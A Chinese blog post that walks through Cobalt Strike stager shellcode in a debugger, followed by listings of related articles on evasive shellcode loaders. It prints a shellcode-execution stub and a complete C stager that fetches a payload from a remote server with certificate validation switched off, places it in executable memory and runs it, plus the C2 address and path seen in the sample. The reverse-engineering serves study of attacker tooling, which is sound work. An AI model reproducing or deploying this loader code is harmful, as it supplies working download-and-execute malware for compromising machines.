Cobalt Strike shellcode分析

最新推荐文章于 2024-09-15 08:03:51 发布
最新推荐文章于 2024-09-15 08:03:51 发布
阅读量276 收藏 4
点赞数 3
分类专栏: web安全 安全测试 网络安全 文章标签: 数据库 服务器 linux web安全 java python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hacker_doggy/article/details/140751658
版权

0x00 分析样本

#include<stdio.h>``#include<Windows.h>``#pragma comment(linker, "/section:.data,RWE")`
`unsigned char buf[] = "shellcode";`
`int main()``{`    `//反调试不是很强的可以用来定位入口点`  `printf("hell word!!\r\n");``__asm`   `{`    `mov eax, offset buf`    `jmp eax`  `}``}

0x01 分析过程

图片

图片

shellcode入口,开始进行调试

图片

进入0X00D1983F函数,,找到函数后循环都会经过这里push了wininet字符串和0x726774C

图片

进入ebp的call分析

图片

第一次拿的是本身exe

图片

第二次拿的是ntdll.dll

图片

然后拿到ntdll.dll的导出表地址

图片

导出函数个数

图片

然后进行遍历

图片

与0x0726774c进行比较,看是否是需要的函数

图片

图片

最后遍历出来找的是LoadLibrary地址,通过LoadLibrary调用起了wininet.dll

图片

图片

然后遍历拿到 InternetOpenUrlA,并实现调用

图片

图片

再次拿到 InternetConnectA并实现调用,访问ip为“192.168.40.48”

图片

图片

再次拿到HttpOpenRequestA并实现调用网页路径为“/MKMw”

图片

图片

再次拿到InternetSetOptionA并实现调用

图片

图片

再次拿到HttpSendRequestA并实现调用

图片

拿到GetDialogBaseUnits,与上面同理

图片

拿到GetDesktopWindow,与上面同理

图片

拿到InternetFindNextFileA,与上面同理

图片

拿到InternetErrorDlg,与上面同理

图片

拿到VirtualAlloc,与上面同理

图片

拿到InternetReadFile,这是循环在读取

图片

然后放开就直接运行

图片

cs上线

0x02 代码模拟

`char* HttpsGet(const char* szURL, const int port, int nSize, char *UA)``{`
  `URL_COMPONENTSA crackedURL = { 0 };`  `char szHostName[128];`  `char szUrlPath[256];`  `crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);`  `crackedURL.lpszHostName = szHostName;`  `crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);`  `crackedURL.lpszUrlPath = szUrlPath;`  `crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);`  `InternetCrackUrlA(szURL, (DWORD)strlen(szURL), 0, &crackedURL);`
  `// Start of the internet session`  `HINTERNET hInternet = InternetOpenA(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);`
  `// HTTPS version`  `HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);`  `HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);`
  `DWORD dwFlags;`  `DWORD dwBuffLen = sizeof(dwFlags);`  `BOOL bRet = InternetQueryOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)&dwFlags, &dwBuffLen);`
  `if (!bRet) {`    `printf("Failed to query internet options. Error: %d", GetLastError());`    `return NULL;`  `}`
  `dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;`  `dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;`  `dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;`
  `bRet = InternetSetOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));`  `if (!bRet) {`    `printf("Failed to set internet options. Error: %d", GetLastError());`    `return NULL;`  `}`
  `// Send HTTP request`  `HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);`
  `LPVOID p = VirtualAlloc(NULL, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);`
  `DWORD dwRealWord;`
  `for (int i = 0; i < 32; i++) {`    `BOOL response = InternetReadFile(hHttpRequest, (LPVOID)((int)p + i * 0x2000), 0x2000, &dwRealWord);`  `}`
  `InternetCloseHandle(hHttpRequest);`  `InternetCloseHandle(hHttpSession);`  `InternetCloseHandle(hInternet);`
  `((void(WINAPI*)(void))p)();`
  `return NULL;``}`

c代码简单模拟,shellcode请求并上线

0x03 成果

图片

图片

程序员狗哥
关注
专栏目录
Cobalt Strike (CS) 逆向初探
悦分享
08-03 717
当进入第三段文件执行的时候,就算是真正开始了远控文件的旅行,不过那是另一段旅程了,就不在这篇文章里写了(必经本篇篇幅已经好多)。但是,还是还是简单的把那个文件的一些分析写在下面。考虑到已经进入一个远控软件的核心功能部分,按照我的想法,为了方便,还是把内存dump下来,通过静态和动态结合的方式来。因此,祭出Scylla。首先运行到新内存区域入口处:然后点转储内存:选择所处模块的区域,转储PE,因为该修复的都修复了,所以直接转pe文件,也不同修复转储了。(后面的.mem文件要不要都无所谓了)。.........
[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
weixin_30432179的博客
07-21 5000
0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗? 0x002 ShellCo...
CSSG:Cobalt Strike Shellcode生成工具,2024年最新面试官都被搞懵了
2401_83973943的博客
04-17 1053
生成一个信标Shellcode Payload,该Payload可以从同一架构父信标继承关键函数指针。除此之外,工具还会在在加密的Shellcode数据前面加上一个随机生成的向量。使用外部生成的原始Shellcode文件代替生成信标Shellcode。Gzip + b64 - 先进行gzip压缩,然后进行Base64编码。b64 + gzip - 先进行Base64编码,然后进行gzip压缩。生成x86 Shellcode,默认生成x64 Shellcode
Cobalt_strike生成的shellcode分析
qq_41490873的博客
08-12 1588
005F33A0 FC cld //将标志寄存器Flag的方向标志位DF清零。在字串操作中使变址寄存器SI或DI的地址指针自动增加,字串处理由前往后 005F33A1 E8 89 00 00 00 call buf+8Fh (05F342F) 005F33A6 60 pushad 005F33A7 89 E5 mov ebp,esp 005F33A9 3
Metasploit & CobaltStrikeshellcode分析
lacoucou的专栏
07-24 1742
Metasploit & CobaltStrike 生成的shellcode beacon
CSSG:Cobalt Strike Shellcode生成工具
weixin_43977912的博客
01-24 3661
CSSG CSSG是一款功能强大的Cobalt Strike Shellcode生成工具。本质上来说,CSSG是一个具备攻击性的Python脚本,广大研究人员可以使用它来轻松生成并格式化信标Shellcode。 该工具支持生成无阶段信标Shellcode,并带有暴露的退出方法、额外的格式化、加密、编码、压缩和多行输出等功能。 注意:Shellcode的转换通常需要按菜单顺序降序执行。 执行要求 可选的AES加密选项使用/assets文件夹中的python脚本实现。 具体取决于要安装的pycryptodome
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀...
Doge-Loader:GoGolang的Cobalt Strike Shellcode Loader
04-13
Cobalt Strike Shellcode Loader by Golang 本项目感谢朋友gd, skate_zhu的帮助 此项目不进行后续更新,详见衍生新项目 :dog_face:Doge-Loader 本项目主要作用为Cobalt Strikeshellcode加载器 编译:go build -...
CobaltStrikeDetected:40行代码检测到大部分CobaltStrikeshellcode
08-04
由于cobaltstrike等无文件木马区段所在的是private内存,所以在执行loadimage回调的时候可以通过堆栈回溯快速确认是否是无文件木马 检测只需要40行代码: 在loadimagecallback上做堆栈回溯 发现是private区域的内存...
Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒
课嗨教育的专栏
09-09 710
Python2.7 现在很多杀毒软件都会查杀免杀效果有点差。可以使用 python3 来做 shellcode 的免杀处理。 Python3 下载下载最新的版本当前实验的版本是 Python 3.8.6 64 位pyinstaller 4.0 https://www.python.org/downloads/pip install pyinstaller Python3 shellcode 加载代码import ctypes #shellcode 加载 def shel...
反沙箱CobaltStrike木马加载器分析
墨痕诉清风的博客
06-13 1670
1.计算Sleep类函数延时时间与实际流逝时间是否匹配可判断环境是否为正常。对沙箱来说,跳过Sleep节约时间成本是有必要的不可省去,但可适当处理GetTickCount类函数,使其与延时时间匹配。2.对于动态解密,打好断点动态分析比静态分析省时间,至少对我这种刚上路的菜狗来说是这样。3.CertEnumSystemStore可作为CertEnumSystemStore替代品用于执行Shellcode。近日,笔者参加了浙江护网,在攻击队停止攻击的那一天凌晨,Windows服务器被攻破大量失分,早晨溯源时拿到
CobaltStrike4.0 远控分析
mai1zhi2的博客
12-25 1228
1. 概述 Cobalt Strike是渗透测试神器,其功能简介就不用多说了,其4.0版本更新已有一段时间了,这里献丑分析一下,若有错误的地方望大伙指出,谢谢。 2. 样本信息 样本名 artifact4.exe 样本大小 14,336 字节 MD5 9ff9170e001f5619a0be11516051f538 SHA1 b824ed85d7dbe14f193f70d328d061e90c760736 3. 实验环境...
[原创]CobaltStrike & Metasploit Shellcode一键免杀工具
weixin_30686845的博客
01-12 1517
CobaltStrike & Metasploit Shellcode一键免杀工具 作者: K8哥哥 图片 1个月前该工具生成的exe免杀所有杀软,现在未测应该还能过90%的杀软吧。 可选.net版本为系统安装对应版本,1.0仅支持.net EXE生成。 后续版本不一定公开,望大家见谅,有兴趣的自行反编译生成的exe就知道怎么弄了。 注意: 一定要使用无后门特征的C...
4.网络编程
weixin_45476535的博客
09-14 420
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1099
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
55 mysql 的登录认证流程
最新发布
970655147的专栏
09-15 788
这里我们来看一下 mysql 的认证的流程我们这里仅仅看 我们最常见的一个 认证的处理流程我们经常会登录的时候 碰到各种异常信息大概的流程是这样客户端和服务器建立连接之后, 服务器向客户端发送 salt然后 客户端根据 salt 将客户端传入的密码加密之后, 以及相关登录信息传递给服务器然后 服务器进行验证, 验证失败, 响应对应的错误信息给客户端服务器发送 salt 的信息如下客户端发送的认证请求如下服务器响应的认证失败信息如下。
110个oracle常用函数总结
m516387177的博客
09-12 797
nvl2 (expr1, expr2, expr3) ->expr1不为null,返回expr2;为null,返回expr3。nvl(expr1, expr2)->expr1为null,返回expr2;不为null,返回expr1。求最大值,all表示对所有的值求最大值,distinct表示对不同的值求最大值,相同的只取一次。求最小值,all表示对所有的值求最小值,distinct表示对不同的值求最小值,相同的只取一次。nullif (expr1, expr2) ->相等返回null,不等返回expr1。
CobaltStrike逆向分析深度探索
此外,还讨论了如何实现自定义的Beacon检测工具,以及RDI任务的发布和执行流程,并对CobaltStrike的特定功能如DotNet和BOF进行了分析。" CobaltStrike是一款广泛用于红队行动和安全评估的工具,其逆向分析对于理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值